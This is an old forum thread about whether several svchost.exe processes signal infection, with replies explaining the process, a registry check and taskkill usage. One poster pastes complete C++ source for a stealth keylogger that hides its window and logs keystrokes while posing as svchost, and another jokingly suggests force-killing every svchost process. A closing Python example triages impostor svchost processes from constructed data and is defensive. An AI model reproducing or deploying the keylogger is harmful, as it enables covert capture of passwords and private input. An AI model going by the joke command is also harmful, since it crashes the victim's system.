sc0rpi0 Posted January 7, 2008

I just checked my task manager and there are 8 incidents of svchost.exe. Does this probably mean I have a virus?

SomeoneE1se Posted January 7, 2008

yes best way check google on how to remove it

digip Posted January 7, 2008

> yes best way check google on how to remove it

:shock: Oh nooooos...I must have a virus as well...

felony_destined Posted January 8, 2008

yeah, I've had that before but what scared me the most was the part that said 'host' (svcHOST.exe) what am I hosting? I certainly hope not any type of remote access service.

Sparda Posted January 8, 2008

> :shock: Oh nooooos...I must have a virus as well...

I has a init! I has to reinstall my Kubuntu!

K1u Posted January 11, 2008

It is normal to have various instances of svchost... it maintains several internal processes so it is normal to have various running. Does this mean that it is safe? Absolutely not, someone could have easily created an application to name itself as svchost.exe and make itself a SYSTEM process. How will you ever know the difference? Well... AVs, etc... may detect some differences in specific things of the process. Is it possible to make it undetectable by AVs? Yes.

arran Posted January 11, 2008

Multiple instances of svchost.exe don't necessarily mean you're infected with a virus. Anyway, just to be sure, check the entries under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost

http://support.microsoft.com/kb/314056

sablefoxx Posted January 18, 2008

Just "taskkill /f /im svchost.exe" see what happens, if nothing bad does, it was a virus, move to the next one, hehe. (jk)

digip Posted January 18, 2008

> (jk)

Yeah, it's going to kill all of them including the legit ones and cause a reboot. You can use the PID though instead to go one at a time to make sure it's a legit file. Kill only the one in question. TASKKILL /F /PID 1234 /T where 1234 is the PID of the program in question and T kills any processes started by the rogue program.

SomeoneE1se Posted January 18, 2008

in the end you have a virus you phail at keeping your computer clean, go get some antivirus

sablefoxx Posted January 19, 2008

> It is normal to have various instances of svchost... it maintains several internal processes so it is normal to have various running. Does this mean that it is safe? Absolutely not, someone could have easily created an application to name itself as svchost.exe and make itself a SYSTEM process.

You mean like this:

```cpp
/*##########################################################
## SvChost.cpp ##
## Writen by Ep$sil0n ##
## Language C Plus Plus ##
## Features Stealth Keyloggger, Writes to file SvChost.log##
###########################################################*/
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);

int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
    int get_keys();
    return get_keys();
}

int get_keys(void)
{
    short character;
    while(1)
    {
        Sleep(10); // dont want 100% cpu usage
        for(character=8;character<=222;character++)
        {
            if(GetAsyncKeyState(character)==-32767)
            {
                FILE *file;
                file=fopen("svchost.log","a+"); //create file to write to
                if(file==NULL)
                {
                    return 1; // return an error if anything goes wrong
                }
                if(file!=NULL) // if the file was created or was there
                { // go on with the keylogger
                    if((character>=39)&&(character<=64))
                    {
                        fputc(character,file);
                        fclose(file);
                        break;
                    }
                    else if((character>64)&&(character<91))
                    {
                        character+=32;
                        fputc(character,file);
                        fclose(file);
                        break;
                    }
                    else
                    {
                        switch(character) //pretty self explanatory
                        {
                            case VK_SPACE: fputc(' ',file); fclose(file); break;
                            case VK_SHIFT: fputs("[SHIFT]",file); fclose(file); break;
                            case VK_RETURN: fputs("n[ENTER]",file); fclose(file); break;
                            case VK_BACK: fputs("[BACKSPACE]",file); fclose(file); break;
                            case VK_TAB: fputs("[TAB]",file); fclose(file); break;
                            case VK_CONTROL: fputs("[CTRL]",file); fclose(file); break;
                            case VK_DELETE: fputs("[DEL]",file); fclose(file); break;
                            case VK_OEM_1: fputs("[;:]",file); fclose(file); break;
                            case VK_OEM_2: fputs("[/?]",file); fclose(file); break;
                            case VK_OEM_3: fputs("[`~]",file); fclose(file); break;
                            case VK_OEM_4: fputs("[ [{ ]",file); fclose(file); break;
                            case VK_OEM_5: fputs("[|]",file); fclose(file); break;
                            case VK_OEM_6: fputs("[ ]} ]",file); fclose(file); break;
                            case VK_OEM_7: fputs("['"]",file); fclose(file); break;
                            case VK_NUMPAD0: fputc('0',file); fclose(file); break;
                            case VK_NUMPAD1: fputc('1',file); fclose(file); break;
                            case VK_NUMPAD2: fputc('2',file); fclose(file); break;
                            case VK_NUMPAD3: fputc('3',file); fclose(file); break;
                            case VK_NUMPAD4: fputc('4',file); fclose(file); break;
                            case VK_NUMPAD5: fputc('5',file); fclose(file); break;
                            case VK_NUMPAD6: fputc('6',file); fclose(file); break;
                            case VK_NUMPAD7: fputc('7',file); fclose(file); break;
                            case VK_NUMPAD8: fputc('8',file); fclose(file); break;
                            case VK_NUMPAD9: fputc('9',file); fclose(file); break;
                            case VK_CAPITAL: fputs("[CAPS LOCK]",file); fclose(file); break;
                            default: fclose(file); //close the file
                                break;
                        }
                    }
                }
            }
        }
    }
    return EXIT_SUCCESS; //exit success :D
}
```

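The question the thread keeps returning to, how to tell a genuine svchost.exe from a program that only borrows the name, comes down to three checks: image path, parent process, and whether the `-k` group is one listed under the SvcHost registry key arran points to. The triage below is an added example, not code from any poster; the process snapshot, the group list, the `C:\Windows` system root and the `triage` function name are all constructed or assumed for illustration.

```python
# Constructed sample data. On a real host the groups are the value names under the
# SvcHost registry key and the snapshot comes from a process listing.
SVCHOST_GROUPS = {"netsvcs", "LocalService", "NetworkService", "DcomLaunch", "rpcss"}
SYS32 = "C:\\Windows\\System32\\"          # assumes SystemRoot is C:\Windows
EXPECTED_PATH = SYS32 + "svchost.exe"
FAKE = r"C:\Users\demo\AppData\Roaming\SvChost.exe"   # constructed impostor path

SNAPSHOT = [
    {"pid": 620, "ppid": 560, "name": "services.exe",
     "path": SYS32 + "services.exe", "cmd": SYS32 + "services.exe"},
    {"pid": 812, "ppid": 620, "name": "svchost.exe",
     "path": EXPECTED_PATH, "cmd": EXPECTED_PATH + " -k DcomLaunch"},
    {"pid": 1044, "ppid": 620, "name": "svchost.exe",
     "path": EXPECTED_PATH, "cmd": EXPECTED_PATH + " -k netsvcs"},
    {"pid": 3388, "ppid": 2900, "name": "SvChost.exe", "path": FAKE, "cmd": FAKE},
    {"pid": 4012, "ppid": 620, "name": "svchost.exe",
     "path": EXPECTED_PATH, "cmd": EXPECTED_PATH + " -k notagroup"},
]

def triage(snapshot, groups=SVCHOST_GROUPS, expected=EXPECTED_PATH):
    """Return {pid: [reasons]} for each process named svchost.exe that fails a check."""
    by_pid = {p["pid"]: p for p in snapshot}
    known = {g.lower() for g in groups}
    findings = {}
    for p in snapshot:
        if p["name"].lower() != "svchost.exe":      # Windows names are case-insensitive
            continue
        reasons = []
        if p["path"].lower() != expected.lower():
            reasons.append("image path is not " + expected)
        parent = by_pid.get(p["ppid"])
        if parent is None or parent["name"].lower() != "services.exe":
            reasons.append("parent is not services.exe")
        args = p["cmd"].split()
        group = args[args.index("-k") + 1] if "-k" in args[:-1] else None
        if group is None:
            reasons.append("no -k <group> argument")
        elif group.lower() not in known:
            reasons.append("group %r not under the SvcHost key" % group)
        if reasons:
            findings[p["pid"]] = reasons
    return findings

if __name__ == "__main__":
    for pid, reasons in triage(SNAPSHOT).items():
        print(pid, "; ".join(reasons))
```

A PID that comes back with reasons is the one to inspect individually, rather than ending every svchost.exe by image name.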